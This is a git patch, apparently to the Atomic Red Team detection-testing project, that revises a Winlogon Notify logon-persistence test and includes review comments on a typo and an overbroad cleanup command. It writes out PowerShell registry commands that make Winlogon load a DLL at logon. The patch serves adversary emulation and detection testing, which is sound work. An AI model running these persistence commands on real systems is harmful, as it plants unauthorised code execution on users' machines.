From df3e84d861985abe4774696cc1527bd3ffa99ba1 Mon Sep 17 00:00:00 2001
From: hRun
Date: Sat, 24 Jun 2023 01:09:45 +0200
Subject: [PATCH] Correct T1547.004 Winlogon Notification test (#2470)
* Corrected T1547.004 Winlogon Notification test
* Added hint on deprecation
---------
Co-authored-by: Hare Sudhan
---
atomics/T1547.004/T1547.004.md | 14 ++++++++++----
atomics/T1547.004/T1547.004.yaml | 15 ++++++++++++---
2 files changed, 22 insertions(+), 7 deletions(-)
diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md
index 477357c4..c03346b8 100644
--- a/atomics/T1547.004/T1547.004.md
+++ b/atomics/T1547.004/T1547.004.md
@@ -106,7 +106,9 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
 ## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
 PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
-Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
 **Supported Platforms:** Windows
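Review bot: The deprecation sentence added in this hunk misspells "earlier" as "erlier"; the corrected line is `Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to earlier versions of Windows.` The identical sentence is added to the .yaml in the first hunk of the second file, so it needs the same fix there; the .md looks like it is generated from the .yaml, in which case correcting the .yaml and regenerating is sufficient. Since the note itself says the mechanism is gone on Vista and later, the description would help whoever validates detections if it stated plainly what is observable on supported versions, e.g. `On Windows Vista / Server 2008 and later the registry keys are written but are not acted on by Winlogon, so the registry modification itself is the expected signal.`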
@@ -121,19 +123,23 @@ Upon successful execution, PowerShell will modify a registry value to execute at
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_to_execute | Path of notification package to execute | path | C:\Windows\Temp\atomicNotificationPackage.dll|
+| function_to_execute | Function in notification package to execute | string | AtomicTestFunction|
 #### Attack Commands: Run with `powershell`!
 ```powershell
-New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
 ```
 #### Cleanup Commands:
 ```powershell
-Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
+Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force -ErrorAction Ignore
 ```
diff --git a/atomics/T1547.004/T1547.004.yaml b/atomics/T1547.004/T1547.004.yaml
index a4a6ee97..0347de9d 100644
--- a/atomics/T1547.004/T1547.004.yaml
+++ b/atomics/T1547.004/T1547.004.yaml
@@ -47,7 +47,9 @@ atomic_tests:
 description: |
 PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
- Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+ Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+ Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
 supported_platforms:
 - windows
 input_arguments:
@@ -55,10 +57,17 @@ atomic_tests:
 description: Path of notification package to execute
 type: path
 default: C:\Windows\Temp\atomicNotificationPackage.dll
+ function_to_execute:
+ description: Function in notification package to execute
+ type: string
+ default: AtomicTestFunction
 executor:
 command: |
- New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
- Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+ New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
 cleanup_command: |
 Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
 name: powershell
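Review bot: In the second hunk of the .yaml the `cleanup_command` is left as an unchanged context line and still deletes the parent `...\Winlogon\Notify` key, while the attack commands in the same hunk now create and populate the `...\Winlogon\Notify\AtomicRedTeam` subkey and the .md's cleanup in the previous file was updated to remove exactly that subkey. The cleanup therefore removes more than the test created, which on a host that already has other subkeys under `Notify` would destroy state unrelated to the test, and the two files no longer agree. The line should become `Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force -ErrorAction Ignore`, matching the .md. If `Notify` did not exist before the run, `New-Item -Force` presumably creates it as an intermediate key and the narrower cleanup would leave that empty key behind; that is acceptable but worth a one-line comment so the residue is not mistaken for a detection artifact.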